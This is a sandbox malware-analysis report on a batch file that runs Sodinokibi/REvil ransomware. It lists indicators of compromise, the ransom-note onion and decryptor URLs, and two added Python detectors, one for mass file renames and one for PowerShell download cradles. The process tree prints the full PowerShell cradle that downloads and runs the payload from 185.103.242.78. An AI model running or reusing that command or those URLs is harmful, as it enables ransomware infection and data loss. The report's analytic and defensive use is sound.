Analysis
max time kernel: 150s
max time network: 149s
platform: windows10_x64
resource: win10
submitted: 03-10-2020 01:10
Static task: static1
Behavioral task: behavioral1
  Sample: 5436705d1e25ce0a762a32c200158950.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 5436705d1e25ce0a762a32c200158950.bat
  Resource: win10
General
Target: 5436705d1e25ce0a762a32c200158950.bat
Size: 218B
MD5: a9f336d51108c56fda11701557ded1ec
SHA1: 57aa584c781307cf32c1ff13800d0e2acdc3eb3e
SHA256: b5877c4cc1d72694fa3faafa1879979975365e52e7232eb6a3a9fe8aef4aea3c
SHA512: 4c54738d6e6c73cba4f1376276314ee6a8ad69a33ca1eb5b011f2a46d78def7e44b01d9349495f366433ea8582fb0bdae124f554be08fa6fc314437703893274
Malware Config
Extracted
  URL: http://185.103.242.78/pastes/5436705d1e25ce0a762a32c200158950
Extracted
  Path: C:\kbokpg-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CB7C9BD72FBA8814
    http://decryptor.cc/CB7C9BD72FBA8814
Signatures
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request 134 IoCs
Processes:
pid   process         flow
3420  powershell.exe  8, 11, 13, 15, 17, 19, 21, 25, 27, 29, 31, 33, 35, 37, 39, 41, 43, 45, 47, 49, 51, 53, 55, 57, 59, 61, 63, 65, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 90, 92, 94, 96, 98, 101, 103, 105, 107, 109, 111, 114, 116, 118, 120, 122, 124, 126, 128, 130, 132, 134, 136, 138, 140, 142
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description   ioc                                                                                                  process
File renamed  C:\Users\Admin\Pictures\WaitRevoke.png => \??\c:\users\admin\pictures\WaitRevoke.png.kbokpg              powershell.exe
File renamed  C:\Users\Admin\Pictures\ClearExit.raw => \??\c:\users\admin\pictures\ClearExit.raw.kbokpg                powershell.exe
File renamed  C:\Users\Admin\Pictures\ConvertMove.png => \??\c:\users\admin\pictures\ConvertMove.png.kbokpg            powershell.exe
File renamed  C:\Users\Admin\Pictures\DisconnectFormat.png => \??\c:\users\admin\pictures\DisconnectFormat.png.kbokpg  powershell.exe
File renamed  C:\Users\Admin\Pictures\ReceiveEnter.png => \??\c:\users\admin\pictures\ReceiveEnter.png.kbokpg          powershell.exe
File renamed  C:\Users\Admin\Pictures\SaveSend.raw => \??\c:\users\admin\pictures\SaveSend.raw.kbokpg                  powershell.exe
File renamed  C:\Users\Admin\Pictures\StepEnter.raw => \??\c:\users\admin\pictures\StepEnter.raw.kbokpg                powershell.exe
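The rows above pair one constant appended extension (.kbokpg) with a ransom note named after it (kbokpg-readme.txt, the file the "Drops file in Program Files directory" signature records). The following heuristic is an added example and not part of the sandbox report: it reads IoC rows in the same "File renamed SRC => DST PROCESS" / "File created PATH PROCESS" wording the report uses, groups appended-extension renames per process, and reports any process that renamed at least min_files distinct files to a single new extension, noting whether that process also created a matching <ext>-readme.txt. The sample rows are the report's own rename and note-creation entries plus one constructed benign rename by explorer.exe; the threshold of five files is an assumption.

```python
"""Heuristic for ransomware-style bulk renames in sandbox file-event rows.

Added example, not part of the sandbox report. It reads rows in the same
'File renamed SRC => DST PROCESS' / 'File created PATH PROCESS' wording the
report uses; the threshold of five files is an assumption.
"""
import re
from collections import defaultdict

# Sample rows: the report's own rename and note-creation IoCs, plus one
# constructed benign rename by explorer.exe that must not be flagged.
SAMPLE_ROWS = [
    r"File renamed C:\Users\Admin\Pictures\WaitRevoke.png => \??\c:\users\admin\pictures\WaitRevoke.png.kbokpg powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ClearExit.raw => \??\c:\users\admin\pictures\ClearExit.raw.kbokpg powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ConvertMove.png => \??\c:\users\admin\pictures\ConvertMove.png.kbokpg powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\DisconnectFormat.png => \??\c:\users\admin\pictures\DisconnectFormat.png.kbokpg powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ReceiveEnter.png => \??\c:\users\admin\pictures\ReceiveEnter.png.kbokpg powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\SaveSend.raw => \??\c:\users\admin\pictures\SaveSend.raw.kbokpg powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\StepEnter.raw => \??\c:\users\admin\pictures\StepEnter.raw.kbokpg powershell.exe",
    r"File created \??\c:\program files\kbokpg-readme.txt powershell.exe",
    r"File created \??\c:\program files (x86)\kbokpg-readme.txt powershell.exe",
    r"File renamed C:\Users\Admin\Documents\notes.txt => C:\Users\Admin\Documents\notes.txt.bak explorer.exe",
]

RENAME_RE = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+?) (?P<proc>\S+)$")
CREATE_RE = re.compile(r"^File created (?P<path>.+?) (?P<proc>\S+)$")


def normalize(path):
    """Drop the NT object-manager prefix the sandbox records and fold case."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def appended_extension(src, dst):
    """Return EXT when dst is exactly src plus '.EXT', else None."""
    s, d = normalize(src), normalize(dst)
    if d.startswith(s + ".") and "." not in d[len(s) + 1:]:
        return d[len(s) + 1:]
    return None


def detect_bulk_renames(rows, min_files=5):
    """Group appended-extension renames per process and report bulk renamers.

    A finding names the process that renamed at least min_files distinct files
    to one new extension and says whether it also created '<ext>-readme.txt',
    the note-naming pattern in the report (.kbokpg / kbokpg-readme.txt).
    """
    renamed = defaultdict(lambda: defaultdict(set))   # proc -> ext -> {src}
    created = defaultdict(set)                        # proc -> {file name}
    for row in rows:
        m = RENAME_RE.match(row)
        if m:
            ext = appended_extension(m["src"], m["dst"])
            if ext:
                renamed[m["proc"]][ext].add(normalize(m["src"]))
            continue
        m = CREATE_RE.match(row)
        if m:
            created[m["proc"]].add(normalize(m["path"]).rsplit("\\", 1)[-1])
    findings = []
    for proc, by_ext in renamed.items():
        for ext, files in by_ext.items():
            if len(files) >= min_files:
                findings.append({
                    "process": proc,
                    "extension": ext,
                    "files": len(files),
                    "ransom_note": f"{ext}-readme.txt" in created.get(proc, set()),
                })
    return findings


if __name__ == "__main__":
    for finding in detect_bulk_renames(SAMPLE_ROWS):
        print(finding)
```

Counting distinct source paths per (process, extension) rather than raw rename events keeps a single file renamed back and forth from tripping the threshold, and the note check only confirms a hit that the rename count already produced, so a process that drops a readme without renaming anything is not reported on its own.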
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description              ioc                                                                                                                                   process
File opened (read-only)  \??\T:, \??\W:, \??\X:, \??\Z:, \??\G:, \??\P:, \??\R:, \??\V:, \??\Y:, \??\D:, \??\N:, \??\O:, \??\H:, \??\J:, \??\L:, \??\S:, \??\A:, \??\F:, \??\I:, \??\K:, \??\M:, \??\Q:, \??\U:, \??\B:, \??\E:  powershell.exe
Modifies service 2 TTPs 5 IoCs
Processes:
description  ioc                                                                                                          process
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}  vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                                     vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                                   vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                          vssvc.exe
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer                     vssvc.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
description      ioc                                                                                                                                               process
Set value (str)  \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\97911gg8k04.bmp"  powershell.exe
Drops file in Program Files directory 12 IoCs
Processes:
description                   ioc                                            process
File created                  \??\c:\program files\kbokpg-readme.txt         powershell.exe
File created                  \??\c:\program files (x86)\kbokpg-readme.txt   powershell.exe
File opened for modification  \??\c:\program files\ExitDebug.xps             powershell.exe
File opened for modification  \??\c:\program files\FindUnblock.tif           powershell.exe
File opened for modification  \??\c:\program files\LimitOptimize.wps         powershell.exe
File opened for modification  \??\c:\program files\OutTest.MTS               powershell.exe
File opened for modification  \??\c:\program files\StartAdd.vdw              powershell.exe
File opened for modification  \??\c:\program files\UninstallSplit.raw        powershell.exe
File opened for modification  \??\c:\program files\UpdateRepair.inf          powershell.exe
File opened for modification  \??\c:\program files\ConvertSend.M2V           powershell.exe
File opened for modification  \??\c:\program files\ResizeReceive.wav         powershell.exe
File opened for modification  \??\c:\program files\UnregisterGrant.rm        powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid   process
3420  powershell.exe
3420  powershell.exe
3420  powershell.exe
3420  powershell.exe
3420  powershell.exe
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description                      pid   process
Token: SeDebugPrivilege          3420  powershell.exe
Token: SeDebugPrivilege          3420  powershell.exe
Token: SeTakeOwnershipPrivilege  3420  powershell.exe
Token: SeBackupPrivilege         2884  vssvc.exe
Token: SeRestorePrivilege        2884  vssvc.exe
Token: SeAuditPrivilege          2884  vssvc.exe
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
description                       pid   process  target process
PID 1588 wrote to memory of 3420  1588  cmd.exe  powershell.exe
PID 1588 wrote to memory of 3420  1588  cmd.exe  powershell.exe
PID 1588 wrote to memory of 3420  1588  cmd.exe  powershell.exe
Processes
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5436705d1e25ce0a762a32c200158950.bat"
  PID: 1588
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/5436705d1e25ce0a762a32c200158950');Invoke-UPTPJHLHIIY;Start-Sleep -s 10000"
    PID: 3420
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 2884
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
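The process tree above is the whole chain the report attributes to the 218-byte .bat: cmd.exe runs the batch file, which launches the 32-bit (SysWOW64) PowerShell with an IEX/DownloadString cradle that fetches the next stage from 185.103.242.78, calls the function it defines, and then sleeps so the host process stays alive. The following is an added example, not part of the sandbox report, of flagging that launch pattern in process-creation telemetry. The event lines are constructed in a made-up key=value layout whose field names (pid, ppid, image, parent, cmd) are assumptions, not a real Sysmon or Security-log export; the powershell.exe command line is the one recorded in the report, the other two events are invented to show non-matching launches.

```python
"""Flag PowerShell download-cradle launches in process-creation telemetry.

Added example, not part of the sandbox report. Event lines use a constructed
'key=value' layout; the field names (pid, ppid, image, parent, cmd) are
assumptions, not a real Sysmon Event ID 1 export format.
"""
import re

# Constructed sample events. The second one carries the powershell.exe
# command line recorded in the report (PID 3420, parent cmd.exe PID 1588);
# the others are made up to show launches that must not match.
SAMPLE_EVENTS = [
    'pid=1588 ppid=900 image=C:\\Windows\\system32\\cmd.exe parent=C:\\Windows\\explorer.exe '
    'cmd=C:\\Windows\\system32\\cmd.exe /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\5436705d1e25ce0a762a32c200158950.bat"',
    'pid=3420 ppid=1588 image=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
    'parent=C:\\Windows\\system32\\cmd.exe '
    'cmd=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "IEX (New-Object System.Net.WebClient)'
    ".DownloadString('http://185.103.242.78/pastes/5436705d1e25ce0a762a32c200158950');"
    'Invoke-UPTPJHLHIIY;Start-Sleep -s 10000"',
    'pid=4100 ppid=2200 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'parent=C:\\Windows\\explorer.exe cmd=powershell.exe -File C:\\scripts\\inventory.ps1',
]

EVENT_RE = re.compile(
    r"^pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) image=(?P<image>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$"
)
# Invoke-Expression (or its IEX alias) fed by a .NET or PowerShell download primitive.
CRADLE_RE = re.compile(
    r"\b(?:IEX|Invoke-Expression)\b.*?(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# A long Start-Sleep after the payload keeps the host process alive; the report shows -s 10000.
SLEEP_RE = re.compile(r"Start-Sleep\s+-s(?:econds)?\s+(\d{4,})", re.IGNORECASE)
SCRIPT_HOST_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe"}


def parse_event(line):
    """Split one constructed event line into its fields, or return None."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def analyze(line):
    """Return a finding for a PowerShell download cradle, or None for anything else."""
    ev = parse_event(line)
    if ev is None or not ev["image"].lower().endswith("powershell.exe"):
        return None
    cmd = ev["cmd"]
    if not CRADLE_RE.search(cmd):
        return None
    reasons = ["download-cradle"]
    # 32-bit PowerShell on a 64-bit host is rarely what an administrator runs by hand.
    if "\\syswow64\\" in ev["image"].lower():
        reasons.append("wow64-powershell")
    parent_name = ev["parent"].lower().rsplit("\\", 1)[-1]
    if parent_name in SCRIPT_HOST_PARENTS:
        reasons.append("spawned-by-" + parent_name)
    if SLEEP_RE.search(cmd):
        reasons.append("long-sleep")
    return {
        "pid": int(ev["pid"]),
        "ppid": int(ev["ppid"]),
        "urls": URL_RE.findall(cmd),   # stage-two source, for blocking and pivoting
        "reasons": reasons,
    }


def find_cradles(lines):
    """Run analyze() over every line and keep the hits."""
    return [hit for hit in map(analyze, lines) if hit is not None]


if __name__ == "__main__":
    for hit in find_cradles(SAMPLE_EVENTS):
        print(hit)
```

The cradle regex alone is the alert condition; the WOW64 path, the cmd.exe parent and the long sleep are carried as extra reasons so an analyst can rank hits, and the extracted URL is what to feed to network blocking and to a search for other hosts that fetched the same paste.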
Network
MITRE ATT&CK Enterprise v6
Downloads
memory/3420-0-0x0000000000000000-mapping.dmp
memory/3420-1-0x00000000736F0000-0x0000000073DDE000-memory.dmp (6.9MB)
memory/3420-2-0x00000000068B0000-0x00000000068B1000-memory.dmp (4KB)
memory/3420-3-0x0000000007060000-0x0000000007061000-memory.dmp (4KB)
memory/3420-4-0x0000000006EA0000-0x0000000006EA1000-memory.dmp (4KB)
memory/3420-5-0x0000000007690000-0x0000000007691000-memory.dmp (4KB)
memory/3420-6-0x0000000007700000-0x0000000007701000-memory.dmp (4KB)
memory/3420-7-0x0000000007A20000-0x0000000007A21000-memory.dmp (4KB)
memory/3420-8-0x00000000077D0000-0x00000000077D1000-memory.dmp (4KB)
memory/3420-9-0x00000000081D0000-0x00000000081D1000-memory.dmp (4KB)
memory/3420-10-0x0000000008040000-0x0000000008041000-memory.dmp (4KB)
memory/3420-11-0x00000000097C0000-0x00000000097C1000-memory.dmp (4KB)
memory/3420-12-0x0000000008D30000-0x0000000008D31000-memory.dmp (4KB)